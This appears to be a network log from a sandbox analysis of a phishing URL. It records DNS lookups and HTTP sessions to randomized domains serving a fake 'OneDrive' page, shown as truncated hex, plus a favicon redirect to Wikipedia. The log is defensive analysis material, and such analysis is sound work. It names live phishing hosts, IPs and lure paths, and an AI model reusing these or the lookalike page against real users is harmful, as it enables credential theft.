                                                                                                                                                                Nov 23, 2024 20:35:56.852803946 CET192.168.2.41.1.1.10x6fbdStandard query (0)nova-drive.xkndniwljldraoauu.comA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:35:56.853106976 CET192.168.2.41.1.1.10xed95Standard query (0)nova-drive.xkndniwljldraoauu.com65IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:35:59.087158918 CET192.168.2.41.1.1.10x493fStandard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:35:59.087296963 CET192.168.2.41.1.1.10xcbe1Standard query (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:35:59.339982033 CET192.168.2.41.1.1.10xd3f5Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:35:59.340291023 CET192.168.2.41.1.1.10xba36Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:35:59.341736078 CET192.168.2.41.1.1.10x16b2Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:35:59.341864109 CET192.168.2.41.1.1.10x2abeStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:35:59.342498064 CET192.168.2.41.1.1.10x785bStandard query (0)stackpath.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:35:59.342628002 CET192.168.2.41.1.1.10xacc8Standard query (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:36:01.482991934 CET192.168.2.41.1.1.10x8c59Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:36:01.483119965 CET192.168.2.41.1.1.10xa849Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:36:01.597728968 CET192.168.2.41.1.1.10x2c21Standard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:36:01.598054886 CET192.168.2.41.1.1.10xd89cStandard query (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:36:01.829938889 CET192.168.2.41.1.1.10xfa2eStandard query (0)stackpath.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:36:01.830084085 CET192.168.2.41.1.1.10xb64fStandard query (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:36:02.464034081 CET192.168.2.41.1.1.10x5da5Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:36:02.464173079 CET192.168.2.41.1.1.10x1520Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:36:03.020725012 CET192.168.2.41.1.1.10xf7a3Standard query (0)wikipedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:36:03.020863056 CET192.168.2.41.1.1.10x52ecStandard query (0)wikipedia.com65IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:36:05.179378033 CET192.168.2.41.1.1.10xc4b0Standard query (0)www.wikipedia.orgA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:36:05.179522991 CET192.168.2.41.1.1.10x17aeStandard query (0)www.wikipedia.org65IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:36:07.382285118 CET192.168.2.41.1.1.10x3fa4Standard query (0)www.wikipedia.orgA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:36:07.382575035 CET192.168.2.41.1.1.10xd218Standard query (0)www.wikipedia.org65IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:36:22.524593115 CET192.168.2.41.1.1.10x2418Standard query (0)nova-drive.xkndniwljldraoauu.comA (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:36:22.524842978 CET192.168.2.41.1.1.10xfbabStandard query (0)nova-drive.xkndniwljldraoauu.com65IN (0x0001)false
                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                Nov 23, 2024 20:35:42.849951029 CET1.1.1.1192.168.2.40xf7d2No error (0)www.google.co.kr172.217.17.67A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:35:45.737291098 CET1.1.1.1192.168.2.40xf78eNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:35:45.737329960 CET1.1.1.1192.168.2.40x948dNo error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:35:46.835931063 CET1.1.1.1192.168.2.40x9683No error (0)hmf1bnz.slfpgqqwzuxppnscs.com87.121.86.72A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:35:48.428607941 CET1.1.1.1192.168.2.40x3e91No error (0)hmf1bnz.slfpgqqwzuxppnscs.com87.121.86.72A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:35:52.675860882 CET1.1.1.1192.168.2.40xb0fdNo error (0)fdfxhdq0by6.xkndniwljldraoauu.com87.120.114.172A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:35:57.075125933 CET1.1.1.1192.168.2.40x6fbdNo error (0)nova-drive.xkndniwljldraoauu.com87.120.114.172A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:35:59.224425077 CET1.1.1.1192.168.2.40x493fNo error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:35:59.224425077 CET1.1.1.1192.168.2.40x493fNo error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:35:59.330724955 CET1.1.1.1192.168.2.40xcbe1No error (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:35:59.512403011 CET1.1.1.1192.168.2.40x16b2No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:35:59.512403011 CET1.1.1.1192.168.2.40x16b2No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:35:59.512805939 CET1.1.1.1192.168.2.40xd3f5No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:35:59.512805939 CET1.1.1.1192.168.2.40xd3f5No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:35:59.512805939 CET1.1.1.1192.168.2.40xd3f5No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:35:59.512805939 CET1.1.1.1192.168.2.40xd3f5No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:35:59.512912035 CET1.1.1.1192.168.2.40x2abeNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:35:59.512964964 CET1.1.1.1192.168.2.40xacc8No error (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:35:59.513223886 CET1.1.1.1192.168.2.40x785bNo error (0)stackpath.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:35:59.513223886 CET1.1.1.1192.168.2.40x785bNo error (0)stackpath.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:36:01.640794992 CET1.1.1.1192.168.2.40x8c59No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:36:01.640794992 CET1.1.1.1192.168.2.40x8c59No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:36:01.641139030 CET1.1.1.1192.168.2.40xa849No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:36:01.773458958 CET1.1.1.1192.168.2.40xd89cNo error (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:36:01.773770094 CET1.1.1.1192.168.2.40x2c21No error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:36:01.773770094 CET1.1.1.1192.168.2.40x2c21No error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:36:02.036731958 CET1.1.1.1192.168.2.40xb64fNo error (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:36:02.040649891 CET1.1.1.1192.168.2.40xfa2eNo error (0)stackpath.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:36:02.040649891 CET1.1.1.1192.168.2.40xfa2eNo error (0)stackpath.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:36:02.620138884 CET1.1.1.1192.168.2.40x5da5No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:36:02.620138884 CET1.1.1.1192.168.2.40x5da5No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:36:02.620138884 CET1.1.1.1192.168.2.40x5da5No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:36:02.620138884 CET1.1.1.1192.168.2.40x5da5No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:36:03.164443016 CET1.1.1.1192.168.2.40xf7a3No error (0)wikipedia.com185.15.58.226A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:36:05.319824934 CET1.1.1.1192.168.2.40xc4b0No error (0)www.wikipedia.orgdyna.wikimedia.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:36:05.319824934 CET1.1.1.1192.168.2.40xc4b0No error (0)dyna.wikimedia.org185.15.58.224A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:36:05.320348978 CET1.1.1.1192.168.2.40x17aeNo error (0)www.wikipedia.orgdyna.wikimedia.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:36:07.524281979 CET1.1.1.1192.168.2.40xd218No error (0)www.wikipedia.orgdyna.wikimedia.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:36:07.535801888 CET1.1.1.1192.168.2.40x3fa4No error (0)www.wikipedia.orgdyna.wikimedia.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:36:07.535801888 CET1.1.1.1192.168.2.40x3fa4No error (0)dyna.wikimedia.org185.15.58.224A (IP address)IN (0x0001)false
                                                                                                                                                                Nov 23, 2024 20:36:22.667718887 CET1.1.1.1192.168.2.40x2418No error (0)nova-drive.xkndniwljldraoauu.com87.120.114.172A (IP address)IN (0x0001)false
                                                                                                                                                                • www.google.co.kr
                                                                                                                                                                • fs.microsoft.com
                                                                                                                                                                • hmf1bnz.slfpgqqwzuxppnscs.com
                                                                                                                                                                • fdfxhdq0by6.xkndniwljldraoauu.com
                                                                                                                                                                • www.google.com
                                                                                                                                                                • slscr.update.microsoft.com
                                                                                                                                                                • nova-drive.xkndniwljldraoauu.com
                                                                                                                                                                  • maxcdn.bootstrapcdn.com
                                                                                                                                                                  • cdnjs.cloudflare.com
                                                                                                                                                                  • code.jquery.com
                                                                                                                                                                  • stackpath.bootstrapcdn.com
                                                                                                                                                                  • wikipedia.com
                                                                                                                                                                  • www.wikipedia.org
                                                                                                                                                                • otelrules.azureedge.net
                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                0192.168.2.44974187.121.86.72804888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 23, 2024 20:35:46.957707882 CET453OUTGET /n7brnx1iy HTTP/1.1
                                                                                                                                                                Host: hmf1bnz.slfpgqqwzuxppnscs.com
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Nov 23, 2024 20:35:48.287377119 CET248INHTTP/1.1 302 Found
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Location: https://hmf1bnz.slfpgqqwzuxppnscs.com/n7brnx1iy
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:35:48 GMT
                                                                                                                                                                Content-Length: 70
                                                                                                                                                                Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 6d 66 31 62 6e 7a 2e 73 6c 66 70 67 71 71 77 7a 75 78 70 70 6e 73 63 73 2e 63 6f 6d 2f 6e 37 62 72 6e 78 31 69 79 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                Data Ascii: <a href="https://hmf1bnz.slfpgqqwzuxppnscs.com/n7brnx1iy">Found</a>.
                                                                                                                                                                Nov 23, 2024 20:36:33.302606106 CET6OUTData Raw: 00
                                                                                                                                                                Data Ascii:


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                1192.168.2.44974787.120.114.172804888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 23, 2024 20:35:57.216581106 CET507OUTGET /app2bf2c0d1bdac2add0860270975885c41/673f6b50fb5bd5403fd85206 HTTP/1.1
                                                                                                                                                                Host: nova-drive.xkndniwljldraoauu.com
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Nov 23, 2024 20:35:58.873433113 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:35:58 GMT
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Data Raw: 63 37 33 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 0a 09 09 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 09 3c 74 69 74 6c 65 3e 4f 6e 65 44 72 69 76 65 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 20 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 36 30 30 22 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 [TRUNCATED]
                                                                                                                                                                Data Ascii: c738<!DOCTYPE html><html><head><meta charset="UTF-8" name="viewport"content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no"><title>OneDrive</title><link rel="stylesheet prefetch" href="https://fonts.googleapis.com/css?family=Open+Sans:600"><style>html {line-height: 1.15;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%}body {height: 100%;margin: 0}article,aside,footer,header,nav,section {display: block}h1 {font-size: 2em;margin: .67em 0}figcaption,figure,main {display: block}figure {margin: 1em 40px}hr {box-sizing: content-box;height: 0;overflow: visible}pre {font-family: monospace, monospace;font-size: 1em}a {background-color: transparent;-webkit-text-decoration-skip: objects}abbr[title] {border-bottom: none;text-decoration: underline;text-decoration: underline [TRUNCATED]
                                                                                                                                                                Nov 23, 2024 20:35:58.873475075 CET1236INData Raw: 0a 09 09 73 61 6d 70 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 6d 6f 6e 6f 73 70 61 63 65 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 0a 09 09 7d 0a 0a 09 09 64 66 6e 20 7b 0a 09 09 09
                                                                                                                                                                Data Ascii: samp {font-family: monospace, monospace;font-size: 1em}dfn {font-style: italic}mark {background-color: #ff0;color: #000}small {font-size: 80%}sub,sup {font-size: 75%;line-height
                                                                                                                                                                Nov 23, 2024 20:35:58.873549938 CET1236INData Raw: 20 7b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 2e 33 35 65 6d 20 2e 37 35 65 6d 20 2e 36 32 35 65 6d 0a 09 09 7d 0a 0a 09 09 6c 65 67 65 6e 64 20 7b 0a 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 63 6f
                                                                                                                                                                Data Ascii: {padding: .35em .75em .625em}legend {box-sizing: border-box;color: inherit;display: table;max-width: 100%;padding: 0;white-space: normal}progress {display: inline-block;vertical-align: baselin
                                                                                                                                                                Nov 23, 2024 20:35:58.873596907 CET388INData Raw: 46 61 62 72 69 63 20 62 75 74 74 6f 6e 2c 0a 09 09 2e 6d 73 2d 46 61 62 72 69 63 20 69 6e 70 75 74 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 69 6e 68 65 72 69 74 0a 09 09 7d 0a 0a 09 09 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64
                                                                                                                                                                Data Ascii: Fabric button,.ms-Fabric input {font-family: inherit}@media (max-width:479px) {.ms-hiddenLgDown,.ms-hiddenMdDown,.ms-hiddenSm,.ms-hiddenXlDown,.ms-hiddenXxlDown {display: none !important}}@med
                                                                                                                                                                Nov 23, 2024 20:35:58.873631954 CET1236INData Raw: 09 09 09 2e 6d 73 2d 68 69 64 64 65 6e 58 78 6c 44 6f 77 6e 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 0a 09 09 09 7d 0a 09 09 7d 0a 0a 09 09 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a
                                                                                                                                                                Data Ascii: .ms-hiddenXxlDown {display: none !important}}@media (min-width:640px) and (max-width:1023px) {.ms-hiddenLg,.ms-hiddenLgDown,.ms-hiddenLgUp,.ms-hiddenMdUp,.ms-hiddenXlDown,.ms-hiddenXxlDown {disp
                                                                                                                                                                Nov 23, 2024 20:35:58.873665094 CET1236INData Raw: 47 31 30 65 41 41 41 42 51 77 41 41 41 41 51 41 41 41 41 45 41 33 39 41 5a 6c 73 62 32 4e 68 41 41 41 46 48 41 41 41 41 41 34 41 41 41 41 4f 41 6c 67 42 61 47 31 68 65 48 41 41 41 41 55 73 41 41 41 41 48 67 41 41 41 43 41 41 65 51 47 65 62 6d 46
                                                                                                                                                                Data Ascii: G10eAAABQwAAAAQAAAAEA39AZlsb2NhAAAFHAAAAA4AAAAOAlgBaG1heHAAAAUsAAAAHgAAACAAeQGebmFtZQAABUwAAAP2AAAJ+oyb8E1wb3N0AAAJRAAAABQAAAAg/1EAfXByZXAAAAlYAAAAiQAAANN4vfIOeJxjYGFvZ5zAwMrAwDqL1ZiBgVEaQjNfZEhjEuJgZeViZGIEAwYgEGBAAN9gBQUGh+eCryw5wHwIyQBWxwLh
                                                                                                                                                                Nov 23, 2024 20:35:58.873708010 CET1236INData Raw: 4e 53 32 57 37 70 32 73 30 36 72 72 76 2f 5a 73 6b 47 2b 2f 77 45 44 31 63 6c 6a 61 53 75 54 32 53 6f 39 66 76 58 56 6e 4e 42 58 79 4e 58 4b 52 32 35 42 52 2b 56 61 72 67 57 54 70 44 7a 45 65 53 34 50 35 41 48 48 65 58 6e 49 63 51 45 58 75 71 43
                                                                                                                                                                Data Ascii: NS2W7p2s06rrv/ZskG+/wED1cljaSuT2So9fvXVnNBXyNXKR25BR+VargWTpDzEeS4P5AHHeXnIcQEXuqCjhWfvVv7HxcPs4bcPd70/AaHFEsIAAHicY2BkYGBgSvR427prUTy/zVcGbg4GENj/92ADiL4adssVRHMwgMU5GZhAFABnEwqPAAB4nGNgZGDgYAABOMnIgAqYAALKAB0AAAAFKgCmCAAA8wDTAAAAAAAAAAAAFgA4
                                                                                                                                                                Nov 23, 2024 20:35:58.873763084 CET672INData Raw: 62 78 76 6b 4d 46 42 4f 38 66 33 43 76 63 53 63 7a 4c 4d 56 76 59 76 6d 43 65 65 49 30 6f 66 77 67 79 66 6c 70 38 4d 2f 58 31 6f 6e 36 55 34 4d 38 51 64 65 79 6e 59 6a 30 4d 50 48 55 71 58 37 49 32 71 6e 65 32 4d 48 6a 68 6e 68 78 30 78 33 45 65
                                                                                                                                                                Data Ascii: bxvkMFBO8f3CvcSczLMVvYvmCeeI0ofwgyflp8M/X1on6U4M8QdeynYj0MPHUqX7I2qne2MHjhnhx0x3EextqDev+SaBDPR4bth7nomesYGbZJZrtqjBtWhYYp7xXqOO96xhPigOI4709vmyYtOe8m+HfeVao58RlYLzmPoRMUVkdWQV28RuAt+S7Jc1zC9Ulcd7xXa5LifMl/9zPdxp+s4H1ZgeBJb5inHdTdnbaqUtHOspuG5
                                                                                                                                                                Nov 23, 2024 20:35:58.873811007 CET1236INData Raw: 09 09 09 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 67 72 61 79 73 63 61 6c 65 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 61 6e 74 69 61 6c 69 61 73 65 64 3b 0a 09 09 09
                                                                                                                                                                Data Ascii: -moz-osx-font-smoothing: grayscale;-webkit-font-smoothing: antialiased;display: inline-block;font-family: 'FabricMDL2Icons';font-style: normal;font-weight: normal;}.ms-Icon--Cancel:before {content: "E711";}
                                                                                                                                                                Nov 23, 2024 20:35:58.873845100 CET1236INData Raw: 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 70 78 3b 0a 09 09 09 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 61 36 61 36 61 36 3b 0a 09 09 09 6d 61 72 67 69 6e 2d 72 69 67
                                                                                                                                                                Data Ascii: border-width: 1px;border-style: solid;border-color: #a6a6a6;margin-right: 8px;transition-property: 'background, border, border-color';transition-duration: .2s;transition-timing-function: .2s;overflow: hidden}
                                                                                                                                                                Nov 23, 2024 20:35:59.071698904 CET1236INData Raw: 74 3a 20 30 3b 0a 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 74 72 61 6e 73 69 74 69 6f 6e 3a 20 74 6f 70 20 2e 35 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 0a 09 09 7d 0a 0a 09 09 2e 6e 6f 74 69 66 69 63 61 74 69 6f 6e 20 2e 64 69 73
                                                                                                                                                                Data Ascii: t: 0;width: 100%;transition: top .5s ease-in-out}.notification .dismiss {border: 0;padding: 0;background: 0 0;height: 15px;width: 15px;margin: 0 8px}.notification .dismiss:hover {cursor: pointe
                                                                                                                                                                Nov 23, 2024 20:36:02.617506981 CET468OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                Host: nova-drive.xkndniwljldraoauu.com
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                Referer: http://nova-drive.xkndniwljldraoauu.com/app2bf2c0d1bdac2add0860270975885c41/673f6b50fb5bd5403fd85206
                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Nov 23, 2024 20:36:03.018840075 CET220INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Location: https://wikipedia.com
                                                                                                                                                                Date: Sat, 23 Nov 2024 19:36:02 GMT
                                                                                                                                                                Content-Length: 56
                                                                                                                                                                Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 69 6b 69 70 65 64 69 61 2e 63 6f 6d 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                Data Ascii: <a href="https://wikipedia.com">Moved Permanently</a>.


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                2192.168.2.44974287.121.86.72804888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 23, 2024 20:36:32.088604927 CET6OUTData Raw: 00
                                                                                                                                                                Data Ascii:


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                3192.168.2.44974887.120.114.172804888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Nov 23, 2024 20:36:42.252034903 CET6OUTData Raw: 00
                                                                                                                                                                Data Ascii:


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                0192.168.2.449736172.217.17.674434888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
